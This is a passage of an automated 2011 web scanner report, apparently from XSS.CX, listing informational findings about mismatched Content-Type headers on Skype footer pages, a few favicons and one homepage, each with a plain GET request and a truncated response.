The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/lt/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:19 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16109

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.70. http://www.skype.com/intl/lv/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/lv/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/lv/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:19 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 15768

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.71. http://www.skype.com/intl/nl/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/nl/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/nl/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16160

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.72. http://www.skype.com/intl/no/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/no/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/no/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16256

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.73. http://www.skype.com/intl/pl/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/pl/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/pl/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:21 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16489

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.74. http://www.skype.com/intl/pt-br/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/pt-br/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/pt-br/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16353

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.75. http://www.skype.com/intl/pt/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/pt/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/pt/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:21 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16517

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.76. http://www.skype.com/intl/ru/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/ru/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/ru/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 18181

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.77. http://www.skype.com/intl/sv/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/sv/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/sv/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:23 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16196

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.78. http://www.skype.com/intl/tr/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/tr/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/tr/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:24 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16435

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.79. http://www.skype.com/intl/zh-Hans/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/zh-Hans/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/zh-Hans/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:24 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16064

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.80. http://www.skype.com/intl/zh-Hant/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/zh-Hant/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/zh-Hant/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:25 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16318

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.81. https://www.trustwave.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trustwave.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.trustwave.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3f8jad7n25ekrcbukulr2hcf12

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:30 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 21:58:13 GMT
ETag: "84153-37e-49b0347768740"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..........................................@.U..U..U..U..U..U..U..U..U..U...@................U..U..U..U..U..U..U..U..U..U.....................U..U..U..U..U..U..U..U..U.
...[SNIP]...

26.82. http://www.vodburner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vodburner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.vodburner.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:14 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 06 Jul 2010 09:07:59 GMT
ETag: "4ec13d2-10be-63be39c0"
Accept-Ranges: bytes
Content-Length: 4286
Connection: close
Content-Type: text/plain

...... .... .........(... ...@..... ................................................................................    ..................................................................................
...[SNIP]...

26.83. http://www.xg4ken.com/  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xg4ken.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: www.xg4ken.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:46:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 18
Connection: close
Content-Type: text/html; charset=UTF-8

<BR>www.xg4ken.com

Report generated by XSS.CX at Mon Sep 05 07:56:49 GMT-06:00 2011.